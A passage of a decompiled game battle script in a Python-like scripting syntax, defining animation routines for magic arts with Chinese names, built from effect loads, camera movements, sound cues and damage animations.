AS_43(0x0, 0x1F4, 0xFF000000)
Sleep(500)
Yield()
SoundEx(341, 0x0)
StopEffect(0xFF, 0x3)
AS_8D(0x4F, 0x0, 0x0, 0x0, 0x0)
ResetBrightness(0)
AS_6E(0x20000)
AS_0A(0xFF, 0x5, 0x0, 0x0)
AS_31(0x16, 0x0)
TurnDirection(0xFF, 0xFB, 0, 0, 0x0)
AS_5F(0xF7, 0x1)
Fade(0x0, 500, 0xFF000000)
Sleep(200)
Yield()
AS_14(0x2D)
FreeEffect(0x0)
CallReturn()
# 防壁之符文 end
def Craft_冰之刃(): pass
label("冰之刃")
ResetTarget()
AS_78(1)
LoadEffect(0x0, "battle\\mg020_00.eff")
LoadEffect(0x1, "battle\\mg020_01.eff")
AS_78(0)
Sleep(125)
Yield()
PlayEffect(0xFF, 0xF9, 0x0, 0x4, 0, 0, 500, 0, 0, 0, 1000, 1000, 1000, -1)
Sleep(1250)
Yield()
LockCamera(0xFE, 0, 0, 0, 800)
AS_14(0x0)
AS_14(0x1)
Call("loc_1D5")
Return()
# 冰之刃 end
def Craft_冰蓝之泪(): pass
label("冰蓝之泪")
ResetTarget()
AS_78(1)
LoadEffect(0x0, "battle\\mg021_00.eff")
LoadEffect(0x1, "battle\\mg021_01.eff")
AS_78(0)
LockCamera(0xFE, 0, 2400, 0, 600)
Sleep(800)
Yield()
PlayEffect(0xFF, 0xFE, 0x0, 0x0, 0, 1300, 0, 0, 0, 0, 1000, 1000, 1000, -1)
Sleep(600)
Yield()
LockCamera(0xFE, 0, 0, 0, 1500)
Sleep(3200)
Yield()
PlayEffect(0xFF, 0xFE, 0x1, 0x0, 0, 1300, 0, 0, 0, 0, 1000, 1000, 1000, -1)
Call("loc_2")
AS_14(0x0)
AS_14(0x1)
Call("loc_1D5")
AS_8F(0x0)
Fade(0x1, 300, 0x0)
AS_31(0x17, 0x0)
LockCamera(0xF4, 0, 0, 0, 0)
Return()
# 冰蓝之泪 end
def Craft_冰之锤(): pass
label("冰之锤")
ResetTarget()
AS_78(1)
LoadEffect(0x0, "battle\\mg022_00.eff")
AS_78(0)
Sleep(200)
Yield()
SetCameraDistance(25000, 1200)
LockCamera(0xFE, 0, 4000, 0, 1200)
Sleep(300)
Yield()
PlayEffect(0xFF, 0xFE, 0x0, 0x0, 0, 50, 0, 0, 0, 0, 1000, 1000, 1000, -1)
Sleep(2400)
Yield()
LockCamera(0xFE, 0, 1000, 0, 200)
SetCameraDistance(20000, 200)
Sleep(200)
Yield()
AS_3D(100, 100, 100, 500)
Call("loc_2")
AS_14(0x0)
AS_14(0x1)
Call("loc_1D5")
Return()
# 冰之锤 end
def Craft_水流轰击(): pass
label("水流轰击")
ResetTarget()
AS_78(1)
LoadEffect(0x0, "battle\\mg023_00.eff")
AS_78(0)
LockCamera(0xF9, 0, 0, 0, 600)
Sleep(600)
Yield()
PlayEffect(0xFF, 0xFF, 0x0, 0x4, 0, 50, 0, 0, 0, 0, 1000, 1000, 1000, 4)
Sleep(600)
Yield()
BlurSwitch(0x12C, 0xBBFFFFFF, 0x1, 0x0, 0x0)
Sleep(600)
Yield()
ResetLookingTargetData()
LookingTargetAdd(0xFC, "", 0x0)
LookingTarget(300, 20, 30)
AS_B0(0x1E, 0x12C)
Sleep(1000)
Yield()
BeginChrThread(0xFF, 3, "loc_24", 0x0)
CancelBlur(500)
WaitEffect(0xFF, 0x4)
FreeEffect(0x0)
WaitChrThread(0xFF, 3)
Return()
label("loc_24")
ResetTarget()
label("loc_25")
ForeachTarget("loc_36")
DamageAnime(0xFE, 0x1, 0x32)
DamageCue(0xFE)
Sleep(50)
Yield()
NextTarget()
Jump("loc_25")
label("loc_36")
CallReturn()
# 水流轰击 end
def Craft_钻石星尘(): pass
label("钻石星尘")
ResetTarget()
AS_78(1)
LoadEffect(0x0, "battle\\mg024_00.eff")
LoadEffect(0x1, "battle\\mg024_01.eff")
LoadEffect(0x2, "battle\\mg024_02.eff")
AS_78(0)
Sleep(200)
Yield()
LockCamera(0xFE, 0, 500, 0, 500)
Sleep(500)
Yield()
PlayEffect(0xFF, 0xFE, 0x0, 0x0, 0, 50, 0, 0, 0, 0, 1000, 1000, 1000, 4)
PlayEffect(0xFF, 0xFE, 0x2, 0x0, 0, 50, 0, 0, 0, 0, 1000, 1000, 1000, -1)
Sleep(4400)
Yield()
PlayEffect(0xFF, 0xFE, 0x1, 0x0, 0, 50, 0, 0, 0, 0, 1000, 1000, 1000, -1)
BeginChrThread(0xFF, 3, "loc_2", 0x0)
WaitEffect(0xFF, 0x4)
AS_14(0x1)
AS_14(0x2)
Call("loc_1D5")
WaitChrThread(0xFF, 3)
Return()
# 钻石星尘 end
def Craft_大海啸(): pass
label("大海啸")
ResetTarget()
AS_78(1)
LoadEffect(0x0, "battle\\mg025_00.eff")
LoadEffect(0x1, "battle\\mg025_01.eff")
AS_78(0)
Sleep(500)
Yield()
SetBrightness(0x0, 0x0, 500)
LockCamera(0xFF, 0, 1500, 0, 600)
Sleep(600)
Yield()
AS_34()
Fade(0x1, 800, 0x0)
AS_60(0xF7)
LockCamera(0xF3, 0, 0, -100000, 0)
SetCameraDistance(20000, 0)
SetCameraDegree(178, 20, 0, 0)
PlayEffect(0xFF, 0xFB, 0x0, 0x0, 0, 0, 0, 0, 0, 0, 1000, 1000, 1000, -1)
SetCameraDegree(180, 30, 0, 2500)
LockCamera(0xF3, 0, 0, -99000, 2500)
SetCameraDistance(21800, 500)
Sleep(1800)
Yield()
Fade(0x1, 1000, 0x0)
AS_5F(0xFC, 0x0)
LockCamera(0xF3, 0, 0, 0, 0)
AS_31(0x17, 0xBB8)
SetCameraDistance(33000, 3000)
Sleep(1500)
Yield()
ResetTarget()
label("loc_1276")
ForeachTarget("loc_129F")
PlayEffect(0xFF, 0xF8, 0x1, 0x0, 0, 0, 0, 0, 0, 0, 1000, 1000, 1000, -1)
Sleep(60)
Yield()
NextTarget()
Jump("loc_1276")
label("loc_129F")
BeginChrThread(0xFF, 3, "loc_2", 0x0)
ResetBrightness(500)
Sleep(1500)
Yield()
AS_14(0x0)
AS_14(0x1)
Call("loc_1D5")
WaitChrThread(0xFF, 3)
AS_8F(0x0)
Fade(0x1, 300, 0x0)
SetBrightness(0x0, 0x1, 0)
AS_5F(0xF7, 0x1)
AS_31(0x17, 0x0)
LockCamera(0xF4, 0, 0, 0, 0)
Return()
# 大海啸 end
def Craft_灭世冥寒灾(): pass
label("灭世冥寒灾")
ResetTarget()
AS_78(1)
LoadEffect(0x0, "battle\\mg026_00.eff")
LoadEffect(0x1, "battle\\mg026_01.eff")
LoadEffect(0x2, "battle\\mg026_02.eff")
LoadEffect(0x3, "battle\\mg026_03.eff")
AS_78(0)
Call("loc_17D")
AS_34()
AS_3E(0xFA, 0x0)
LockCamera(0xFD, 0, 0, -10000, 0)
SetCameraDegree(0, 20, -10, 0)
SetCameraDistance(20000, 0)
Fade(0x1, 1500, 0x0)
Sleep(500)
Yield()
SetBattleSpeed(1200)
LockCamera(0xFD, 0, -200, -10000, 4000)
AS_0B(0x0, 0xFA0)
AS_B0(0x1E, 0xFA0)
SetCameraDistance(28000, 4000)
PlayEffect(0xFF, 0xFD, 0x0, 0x0, 0, 0, -10000, 0, 0, 0, 1000, 1000, 1000, 2)
PlayEffect(0xFF, 0xFD, 0x2, 0x0, 0, 0, -10000, 0, 0, 0, 600, 600, 600, 3)
SoundEx(183, 0x0)
Sleep(500)
Yield()
PlayEffect(0xFF, 0xFD, 0x3, 0x0, 0, 0, -10000, 0, 0, 0, 1000, 1000, 1000, 4)
Sleep(1500)
Yield()
AS_0B(0x28, 0x7D0)
AS_B0(0xFFFB, 0x7D0)
SoundEx(187, 0x0)
SetBattleSpeed(800)
Sleep(1000)
Yield()
SetCameraDistance(36000, 1000)
Sleep(600)
Yield()
SoundEx(360, 0x0)
Sleep(400)
Yield()
SetBattleSpeed(700)
StopEffect(0xFF, 0x2)
StopEffect(0xFF, 0x4)
SetBattleSpeed(1000)
Fade(0x1, 800, 0x0)
SoundEx(233, 0x0)
PlayEffect(0xFF, 0xFD, 0x0, 0x0, 0, 0, -10000, 0, 0, 0, 1000, 1000, 1000, 2)
AS_1A(0xFF, 0x2, 0x1130)
SetBattleSpeed(450)
LockCamera(0xFD, -200, -2600, -9900, 0)
SetCameraDistance(13520, 0)
SetCameraDegree(30, 10, 0, 0)
LockCamera(0xFD, 0, 1900, -9700, 1800)
SetCameraDistance(15600, 1800)
SetCameraDegree(330, -13, 0, 1800)
Sleep(1500)
Yield()
SetBattleSpeed(300)
Sleep(300)
Yield()
StopEffect(0xFF, 0x2)
SetBattleSpeed(1000)
Fade(0x1, 1000, 0x0)
PlayEffect(0xFF, 0xFD, 0x0, 0x0, 0, 0, -10000, 0, 0, 0, 1000, 1000, 1000, 2)
AS_1A(0xFF, 0x2, 0x1B58)
PlayEffect(0xFF, 0xFD, 0x3, 0x0, 0, 0, -10000, 0, 0, 0, 1000, 1000, 1000, 4)
AS_1A(0xFF, 0x4, 0x1DB0)
SetBattleSpeed(500)
LockCamera(0xFD, 1000, 1900, -12500, 0)
SetCameraDegree(340, 10, 0, 0)
SetCameraDistance(13000, 0)
SoundEx(339, 0x0)
LockCamera(0xFD, 1500, 2600, -13300, 2500)
SetCameraDistance(4500, 2000)
Sleep(1000)
Yield()
SetBattleSpeed(900)
Sleep(500)
Yield()
StopEffect(0xFF, 0x3)
LockCamera(0xFD, 0, 100, -14000, 350)
SetCameraDegree(35, 2, -10, 350)
SetCameraDistance(28000, 350)
SoundEx(321, 0x0)
Sleep(500)
Yield()
SetBattleSpeed(1000)
StopEffect(0xFF, 0x2)
StopEffect(0xFF, 0x4)
Fade(0x1, 500, 0x0)
PlayEffect(0xFF, 0xFD, 0x0, 0x0, 0, 0, -10000, 0, 0, 0, 1000, 1000, 1000, 2)
AS_1A(0xFF, 0x2, 0x2904)
PlayEffect(0xFF, 0xFD, 0x3, 0x0, 0, 0, -10000, 0, 0, 0, 1000, 1000, 1000, 4)
AS_1A(0xFF, 0x4, 0x2B5C)
SetBattleSpeed(1300)
PlayEffect(0xFF, 0xFD, 0x2, 0x0, 0, 0, -10000, 0, 0, 0, 1000, 1000, 1000, 3)
SoundEx(339, 0x0)
LockCamera(0xFD, 0, 2000, -13000, 0)
SetCameraDegree(25, 10, -5, 0)
SetCameraDistance(13000, 0)
AS_0B(0x5, 0x3E8)
LockCamera(0xFD, 1200, 2100, -10000, 1000)
SetCameraDistance(9200, 1000)
Sleep(1000)
Yield()
StopEffect(0xFF, 0x3)
AS_0B(0xFFF1, 0x258)
LockCamera(0xFD, 0, 1000, -11000, 600)
AS_B0(0xF, 0x1F4)
SetCameraDistance(28000, 600)
SoundEx(321, 0x0)
Sleep(1000)
Yield()
SetBattleSpeed(1000)
Fade(0x1, 500, 0x0)
AS_5F(0xFC, 0x0)
LockCamera(0xFD, 8000, 2000, 1000, 0)
AS_0B(0xFFA6, 0x0)
AS_B0(0x0, 0x0)
SetCameraDistance(58000, 0)
LockCamera(0xFD, 8000, 1600, 8000, 800)
AS_0B(0x0, 0x320)
SetCameraDistance(60000, 800)
StopEffect(0xFF, 0x2)
StopEffect(0xFF, 0x4)
PlayEffect(0xFF, 0xFD, 0x1, 0x0, 8000, 1000, 8000, 0, 0, 0, 1000, 1000, 1000, 2)
Sleep(800)
Yield()
ResetTarget()
label("loc_16E6")
ForeachTarget("loc_16F0")
EndChrThread(0xFE, 255)
NextTarget()
Jump("loc_16E6")
label("loc_16F0")
Sleep(300)
Yield()
SoundEx(321, 0x0)
Sleep(300)
Yield()
SoundEx(293, 0x0)
Sleep(1400)
Yield()
AS_60(0xFC)
AS_A8(0x0, 0x1)
Fade(0x1, 500, 0x0)
SetBattleSpeed(1150)
LockCamera(0xFD, 200, 1900, -10700, 0)
AS_0B(0x140, 0x0)
AS_B0(0xF, 0x0)
SetCameraDistance(9000, 0)
StopEffect(0xFF, 0x2)
PlayEffect(0xFF, 0xFD, 0x0, 0x0, 0, 0, -10000, 0, 0, 0, 1000, 1000, 1000, 5)
AS_1A(0xFF, 0x5, 0x34BC)
Sleep(200)
Yield()
Sleep(800)
Yield()
SetCameraDistance(14000, 3000)
Sleep(2000)
Yield()
AS_A8(0x0, 0x0)
SetBattleSpeed(1000)
Fade(0x1, 500, 0x0)
AS_5F(0xFC, 0x0)
LockCamera(0xFD, 8000, 1600, 8000, 0)
SetCameraDegree(0, 15, 0, 0)
SetCameraDistance(60000, 0)
StopEffect(0xFF, 0x2)
PlayEffect(0xFF, 0xFD, 0x1, 0x0, 7500, 1000, -5000, 0, 0, 0, 800, 800, 800, 2)
AS_1A(0xFF, 0x2, 0xC80)
Sleep(800)
Yield()
AS_8D(0x8, 0x0, 0x0, 0x0, 0x0)
Sleep(100)
Yield()
AS_60(0xFC)
SoundEx(185, 0x0)
Sleep(800)
Yield()
BlurSwitch(0x12C, 0xBBFFFFFF, 0x0, 0x0, 0x0)
AS_43(0x0, 0x320, 0xFFFFFFFF)
SoundEx(312, 0x0)
Sleep(300)
Yield()
SetBattleSpeed(400)
Sleep(600)
Yield()
CancelBlur(500)
WaitEffect(0xFF, 0x2)
SetBattleSpeed(1000)
AS_A8(0x0, 0x0)
AS_A8(0x0, 0x1)
Call("loc_1D5")
AS_6E(0x40000)
Call("loc_1A3")
Call("loc_1CA")
Return()
# 灭世冥寒灾 end
def Craft_1B_27_1832(): pass
label("Craft_1B_27_1832")
Jump("Craft_11_17_D69")
# Craft_1B_27_1832 end
def Craft_慈爱之符文(): pass
label("慈爱之符文")
ResetTarget()
AS_78(1)
LoadEffect(0x0, "battle\\mg028_00.eff")
LoadEffect(0x3B, "battle\\mg028_01.eff")
LoadEffect(0x3C, "battle\\mg018_02.eff")
LoadEffect(0x3D, "battle\\mg028_03.eff")
AS_78(0)
Call("loc_17D")
Call("loc_BE6")
Return()
# 慈爱之符文 end
def Craft_火之矢(): pass
label("火之矢")
ResetTarget()
AS_78(1)
LoadEffect(0x0, "battle\\mg030_00.eff")
AS_78(0)
Sleep(250)
Yield()
PlayEffect(0xFF, 0xF9, 0x0, 0x4, 0, 0, 500, 0, 0, 0, 1000, 1000, 1000, -1)
Sleep(1200)
Yield()
LockCamera(0xF8, 0, 0, 0, 1000)
AS_14(0x0)
FreeEffect(0x0)
Return()
# 火之矢 end
def Craft_灼热之波(): pass
label("灼热之波")
ResetTarget()
AS_78(1)
LoadEffect(0x0, "battle\\mg031_00.eff")
AS_78(0)
Sleep(250)
Yield()
LockCamera(0xFE, 0, 0, 0, 600)
Sleep(600)
Yield()
PlayEffect(0xFF, 0xFE, 0x0, 0x0, 0, 0, 0, 0, 0, 0, 1000, 1000, 1000, -1)
Sleep(3600)
Yield()
Call("loc_2")
AS_14(0x0)
FreeEffect(0x0)
Return()
# 灼热之波 end
def Craft_熔岩之息(): pass
label("熔岩之息")
ResetTarget()
AS_78(1)
LoadEffect(0x0, "battle\\mg032_00.eff")
AS_78(0)
Sleep(400)
Yield()
LockCamera(0xFE, 0, 0, 0, 600)
Sleep(600)
Yield()
PlayEffect(0xFF, 0xFE, 0x0, 0x0, 0, 50, 0, 0, 0, 0, 1000, 1000, 1000, -1)
Sleep(900)
Yield()
SetCameraDistance(26000, 2500)
DamageAnime(0xFE, 0x0, 0x32)
Sleep(400)
Yield()
DamageAnime(0xFE, 0x0, 0x32)
Sleep(400)
Yield()
DamageAnime(0xFE, 0x0, 0x32)
Sleep(400)
Yield()
DamageAnime(0xFE, 0x0, 0x32)
Sleep(300)
Yield()
DamageCue(0xFE)
AS_14(0x0)
FreeEffect(0x0)
Return()
# 熔岩之息 end
def Craft_炎蝶之舞(): pass
label("炎蝶之舞")
ResetTarget()
AS_78(1)
LoadEffect(0x0, "battle\\mg033_00.eff")
LoadEffect(0x1, "battle\\mg033_01.eff")
AS_78(0)
Sleep(400)
Yield()
LockCamera(0xFB, 0, 0, 0, 600)
SetCameraDistance(23000, 600)
Sleep(600)
Yield()
PlayEffect(0xFF, 0xFB, 0x0, 0x0, 0, 0, 0, 0, 0, 0, 1000, 1000, 1000, -1)
Sleep(2300)
Yield()
AS_B0(0x19, 0x4B0)
Sleep(600)
Yield()
AS_3D(100, 100, 100, 500)
Sleep(500)
Yield()
BlurSwitch(0x12C, 0xBBFFFFFF, 0x0, 0x0, 0x0)
Sleep(400)
Yield()
SetCameraDistance(28000, 300)
AS_3D(250, 250, 250, 3000)
PlayEffect(0xFF, 0xFB, 0x1, 0x0, 0, 0, 0, 0, 0, 0, 1000, 1000, 1000, -1)
Sleep(3000)
Yield()
CancelBlur(500)
BeginChrThread(0xFF, 3, "loc_2", 0x0)
WaitChrThread(0xFF, 3)
AS_14(0x0)
AS_14(0x1)
Call("loc_1D5")
AS_8F(0x0)
Fade(0x1, 300, 0x0)
AS_31(0x17, 0x0)
LockCamera(0xFB, 0, 0, 0, 0)
Return()
# 炎蝶之舞 end
def Craft_赤红射线(): pass
label("赤红射线")
ResetTarget()
AS_78(1)
LoadEffect(0x0, "battle\\mg034_00.eff")
LoadEffect(0x1, "battle\\mg034_01.eff")
AS_78(0)
Sleep(300)
Yield()
SetBrightness(0x0, 0x0, 800)
AS_34()
Fade(0x1, 800, 0x0)
AS_60(0xF7)
AS_5F(0xFC, 0x0)
LockCamera(0xFE, 0, 15000, 0, 0)
SetCameraDistance(24000, 0)
SetCameraDegree(0, 30, 0, 0)
Sleep(800)
Yield()
PlayEffect(0xFF, 0xFE, 0x0, 0x0, 0, 0, 0, 0, 0, 0, 1000, 1000, 1000, -1)
AS_03(0xFC, 0xB4)
Sleep(1900)
Yield()
LockCamera(0xF8, 0, 0, 0, 500)
AS_B0(0x23, 0x190)
Sleep(400)
Yield()
AS_3D(200, 100, 200, 2700)
Sleep(2400)
Yield()
BlurSwitch(0x12C, 0xBBFFFFFF, 0x0, 0x1, 0x7)
Sleep(350)
Yield()
SetCameraDistance(15000, 700)
AS_B0(0x1C, 0x258)
PlayEffect(0xFF, 0xFE, 0x1, 0x0, 0, 0, 0, 0, 0, 0, 1000, 1000, 1000, 2)
Sleep(700)
Yield()
AS_3D(500, 500, 500, 3500)
SetCameraDegree(0, 15, -5, 500)
AS_B0(0x19, 0x5DC)
SetCameraDistance(35000, 4200)
Sleep(2000)
Yield()
SetCameraDegree(-30, 25, -5, 2800)
LockCamera(0xFE, 0, 2000, 0, 2800)
SetBattleSpeed(700)
Sleep(2800)
Yield()
SetBattleSpeed(1000)
Fade(0x1, 500, 0x0)
AS_31(0x17, 0x0)
LockCamera(0xFE, 0, 0, 0, 0)
StopEffect(0xFF, 0x2)
AS_0A(0xFC, 0x1, 0x0, 0x0)
ResetBrightness(0)
AS_5F(0xF7, 0x1)
CancelBlur(500)
Sleep(300)
Yield()
DamageAnime(0xFE, 0x0, 0x32)
DamageCue(0xFE)
AS_14(0x0)
AS_14(0x1)
Call("loc_1D5")
SetBrightness(0x0, 0x1, 0)
AS_8F(0x0)
Return()
# 赤红射线 end
def Craft_龙皇炼狱火(): pass
label("龙皇炼狱火")
ResetTarget()
AS_78(1)
LoadEffect(0x0, "battle\\mg035_00.eff")
LoadEffect(0x1, "battle\\mg035_01.eff")
LoadEffect(0x2, "battle\\mg035_02.eff")
LoadEffect(0x3, "battle\\mg035_03.eff")
LoadEffect(0x4, "battle\\mg035_04.eff")
LoadEffect(0x5, "battle\\mg035_05.eff")
LoadEffect(0x6, "battle\\mg035_06.eff")
LoadEffect(0x7, "battle\\mg015_03.eff")
AS_78(0)
Call("loc_17D")
AS_34()
LockCamera(0xFD, 100, 500, -11200, 0)
SetCameraDegree(0, 10, 0, 0)
SetCameraDistance(22000, 0)
AS_AC(0x3E8, 0x927C0)
PlayEffect(0xFF, 0xFD, 0x0, 0x0, 0, 0, -10000, 0, 0, 0, 1000, 1000, 1000, 2)
SoundEx(197, 0x0)
Sleep(1100)
Yield()
PlayEffect(0xFF, 0xFD, 0x4, 0x0, 0, 0, -10000, 0, 0, 0, 1000, 1000, 1000, 3)
Sleep(300)
Yield()
Fade(0x1, 500, 0x0)
SetBattleSpeed(600)
SoundEx(320, 0x0)
LockCamera(0xFD, 0, 1300, -10900, 0)
AS_0B(0xDC, 0x0)
SetCameraDistance(6500, 0)
AS_0B(0x190, 0x3E8)
SetCameraDistance(3000, 1000)
AS_B0(0x28, 0x708)
Sleep(500)
Yield()
AS_B0(0x28, 0x1F4)
LockCamera(0xFD, -1300, 4400, -11100, 700)
SoundEx(339, 0x0)
Sleep(500)
Yield()
BlurSwitch(0xC8, 0xBBFFFFFF, 0x1, 0x0, 0x0)
SetCameraDistance(6000, 500)
SoundEx(261, 0x0)
Sleep(1500)
Yield()
SoundEx(320, 0x0)
CancelBlur(1000)
SetBattleSpeed(1000)
AS_B0(0x46, 0x3E8)
Sleep(1500)
Yield()
StopEffect(0xFF, 0x2)
StopEffect(0xFF, 0x3)
PlayEffect(0xFF, 0xFD, 0x0, 0x0, 0, 0, -10000, 0, 0, 0, 1000, 1000, 1000, 2)
AS_1A(0xFF, 0x2, 0x14B4)
PlayEffect(0xFF, 0xFD, 0x4, 0x0, 0, 0, -10000, 0, 0, 0, 1000, 1000, 1000, 3)
AS_1A(0xFF, 0x3, 0x1388)
PlayEffect(0xFF, 0xFD, 0x1, 0x0, 0, 6000, -10000, 0, 0, 0, 900, 900, 900, 4)
AS_1A(0xFF, 0x4, 0x2710)
LockCamera(0xFD, 800, 4000, -10000, 0)
AS_B0(0x54, 0x0)
AS_3C(0xFFD8, 0x0)
AS_0B(0x0, 0x0)
SetCameraDistance(16000, 0)
LockCamera(0xFD, -1000, 36000, -4000, 1800)
SetCameraDistance(17000, 1800)
SoundEx(251, 0x0)
Sleep(300)
Yield()
BlurSwitch(0x32, 0xBBFFFFFF, 0x1, 0x0, 0x0)
Sleep(700)
Yield()
CancelBlur(1000)
StopEffect(0xFF, 0x2)
StopEffect(0xFF, 0x3)
StopEffect(0xFF, 0x4)
Fade(0x1, 200, 0x0)
PlayEffect(0xFF, 0xFD, 0x0, 0x0, 0, 0, -10000, 0, 0, 0, 1000, 1000, 1000, 2)
AS_1A(0xFF, 0x2, 0x1FA4)
LockCamera(0xFD, 0, 35000, -10000, 0)
AS_0B(0xFFB0, 0x0)
AS_B0(0x19, 0x0)
AS_3C(0xA, 0x0)
SetCameraDistance(10000, 0)
SetCameraDistance(13000, 500)
LockCamera(0xFD, 0, 43500, -10000, 2000)
AS_0B(0xFFC4, 0x7D0)
AS_B0(0xFFF6, 0x7D0)
PlayEffect(0xFF, 0xFD, 0x1, 0x0, 0, 6000, -10000, 0, 0, 0, 900, 900, 900, 3)
SoundEx(375, 0x0)
Sleep(1500)
Yield()
SoundEx(204, 0x0)
Sleep(250)
Yield()
SoundEx(253, 0x0)
Sleep(550)
Yield()
CancelEffect(0xFF, 0x3)
Sleep(1000)
Yield()
Fade(0x1, 600, 0x0)
LockCamera(0xFD, 0, 43800, -11400, 0)
AS_B0(0x1, 0x0)
AS_3C(0x0, 0x0)
AS_0B(0xFFFF, 0x0)
SetCameraDistance(600, 0)
PlayEffect(0xFF, 0xFD, 0x6, 0x0, 0, 42500, -11000, 0, 0, 0, 1200, 1200, 1200, 4)
PlayEffect(0xFF, 0xFD, 0x7, 0x0, 0, 0, 0, 0, 0, 0, 1000, 1000, 1000, -1)
SoundEx(320, 0x0)
SetCameraDistance(3000, 3500)
SoundEx(371, 0x0)
Sleep(2500)
Yield()
PlayEffect(0xFF, 0xFD, 0x2, 0x0, 0, 43300, -11000, 15, 180, 0, 150, 150, 150, -1)
AS_0B(0xFFF6, 0x76C)
Sleep(1900)
Yield()
LockCamera(0xFD, 0, 43000, -12000, 500)
AS_0B(0xFFEC, 0x5DC)
AS_B0(0xA, 0x5DC)
SetCameraDistance(10000, 800)
Sleep(800)
Yield()
AS_A8(0x0, 0x7)
CancelEffect(0xFF, 0x4)
AS_A8(0x0, 0x2)
Fade(0x1, 500, 0x0)
LockCamera(0xFD, 10000, 1000, 8000, 0)
AS_0B(0x91, 0x0)
AS_B0(0x14, 0x0)
AS_3C(0x0, 0x0)
SetCameraDistance(30000, 0)
LockCamera(0xFD, 6000, 1000, 8000, 2000)
AS_0B(0x73, 0x7D0)
SetCameraDistance(19000, 3000)
AS_5F(0xFC, 0x0)
Sleep(500)
Yield()
PlayEffect(0xFF, 0xFD, 0x5, 0x0, 8000, 0, 8000, 0, 90, 0, 1000, 1000, 1000, 2)
Sleep(2700)
Yield()
PlayEffect(0xFF, 0xFD, 0x3, 0x0, 8000, 0, 8000, 0, 90, 0, 1200, 1200, 1200, -1)
AS_0B(0x64, 0x7D0)
SetCameraDistance(25000, 3000)
SoundEx(367, 0x0)
Sleep(2300)
Yield()
BeginChrThread(0xFF, 3, "loc_37", 0x0)
Sleep(500)
Yield()
AS_43(0x0, 0x1F4, 0xFFFFFFFF)
Sleep(1500)
Yield()
EndChrThread(0xFF, 3)
AS_A8(0x0, 0x0)
AS_A8(0x0, 0x1)
AS_A8(0x0, 0x2)
AS_A8(0x0, 0x3)
Call("loc_1D5")
Call("loc_1A3")
Call("loc_1CA")
Return()
# 龙皇炼狱火 end
def Craft_24_36_2131(): pass
label("Craft_24_36_2131")
Return()
# Craft_24_36_2131 end
def Craft_25_37_2132(): pass
label("Craft_25_37_2132")
Jump("Craft_11_17_D69")
# Craft_25_37_2132 end
def Craft_胜利之符文(): pass
label("胜利之符文")
ResetTarget()
AS_78(1)
LoadEffect(0x0, "battle\\mg038_00.eff")
LoadEffect(0x3B, "battle\\mg038_01.eff")
LoadEffect(0x3C, "battle\\mg018_02.eff")
LoadEffect(0x3D, "battle\\mg038_03.eff")
AS_78(0)
Call("loc_17D")
Call("loc_BE6")
Return()
# 胜利之符文 end
def Craft_雷电击(): pass
label("雷电击")
ResetTarget()
AS_78(1)
LoadEffect(0x0, "battle\\mg040_00.eff")
AS_78(0)
LockCamera(0xFE, 0, 3500, 0, 600)
Sleep(600)
Yield()
PlayEffect(0xFF, 0xFE, 0x0, 0x0, 0, 50, 0, 0, 0, 0, 1000, 1000, 1000, -1)
Sleep(1000)
Yield()
LockCamera(0xFE, 0, 1000, 0, 200)
AS_3D(200, 200, 200, 200)
DamageAnime(0xFE, 0x0, 0x32)
DamageCue(0xFE)
AS_14(0x0)
FreeEffect(0x0)
Return()
# 雷电击 end
def Craft_风之镰(): pass
label("风之镰")
ResetTarget()
AS_78(1)
LoadEffect(0x0, "battle\\mg041_00.eff")
LoadEffect(0x1, "battle\\mg041_01.eff")
AS_78(0)
Sleep(250)
Yield()
PlayEffect(0xFF, 0xF9, 0x0, 0x5, 0, 50, 0, 0, 0, 0, 1000, 1000, 1000, -1)
Sleep(1000)
Yield()
ResetLookingTargetData()
LookingTargetAdd(0xFC, "", 0x0)
LookingTarget(300, 20, 30)
Sleep(400)
Yield()
ResetTarget()
AS_83(0x0)
label("loc_2276")
ForeachTarget("loc_22A5")
PlayEffect(0xFF, 0xF8, 0x1, 0x10, 0, 50, 0, 0, 0, 0, 1000, 1000, 1000, -1)
DamageAnime(0xFE, 0x0, 0x32)
DamageCue(0xFE)
Sleep(100)
Yield()
NextTarget()
Jump("loc_2276")
label("loc_22A5")
AS_14(0x0)
AS_14(0x1)
Call("loc_1D5")
Return()
# 风之镰 end
def Craft_风之领域(): pass
label("风之领域")
ResetTarget()
AS_78(1)
LoadEffect(0x0, "battle\\mg042_00.eff")
AS_78(0)
Sleep(250)
Yield()
LockCamera(0xFB, 0, 0, 0, 600)
SetCameraDistance(18700, 1000)
Sleep(600)
Yield()
PlayEffect(0xFF, 0xFB, 0x0, 0x0, 0, 50, 0, 0, 0, 0, 1000, 1000, 1000, -1)
Sleep(800)
Yield()
AS_3D(100, 100, 100, 3200)
Sleep(300)
Yield()
BlurSwitch(0x190, 0xBBFFFFFF, 0x1, 0x0, 0x0)
Sleep(400)
Yield()
AS_B0(0x15, 0x7D0)
LockCamera(0xFB, 0, 1800, 0, 2400)
SetCameraDistance(22000, 2400)
Sleep(3200)
Yield()
Fade(0x1, 500, 0x0)
AS_31(0x17, 0x0)
LockCamera(0xFB, 0, 0, 0, 0)
Sleep(800)
Yield()
CancelBlur(500)
Call("loc_2")
AS_14(0x0)
FreeEffect(0x0)
AS_8F(0x0)
Fade(0x1, 300, 0x0)
AS_31(0x17, 0x0)
LockCamera(0xFB, 0, 0, 0, 0)
Return()
# 风之领域 end
def Craft_闪电之力(): pass
label("闪电之力")
ResetTarget()
AS_78(1)
LoadEffect(0x0, "battle\\mg043_00.eff")
LoadEffect(0x1, "battle\\mg043_01.eff")
AS_78(0)
LockCamera(0xF4, 0, 0, 0, 600)
Sleep(600)
Yield()
PlayEffect(0xFF, 0xFB, 0x0, 0x0, 0, 50, 0, 0, 0, 0, 1000, 1000, 1000, 4)
Sleep(1700)
Yield()
ResetTarget()
label("loc_23F7")
ForeachTarget("loc_2426")
PlayEffect(0xFF, 0xFE, 0x1, 0x0, 0, 0, 0, 0, 0, 0, 1000, 1000, 1000, -1)
DamageAnime(0xFE, 0x0, 0x32)
DamageCue(0xFE)
Sleep(50)
Yield()
NextTarget()
Jump("loc_23F7")
label("loc_2426")
WaitEffect(0xFF, 0x4)
AS_14(0x1)
Call("loc_1D5")
Return()
# 闪电之力 end
def Craft_雷光龙卷(): pass
label("雷光龙卷")
ResetTarget()
AS_78(1)
LoadEffect(0x0, "battle\\mg044_00.eff")
LoadEffect(0x1, "battle\\mg043_01.eff")
AS_78(0)
SetBrightness(0x0, 0x0, 800)
Sleep(200)
Yield()
SetCameraDistance(26000, 600)
LockCamera(0xFB, 0, 0, 0, 600)
Sleep(600)
Yield()
AS_60(0xF7)
AS_5F(0xFC, 0x0)
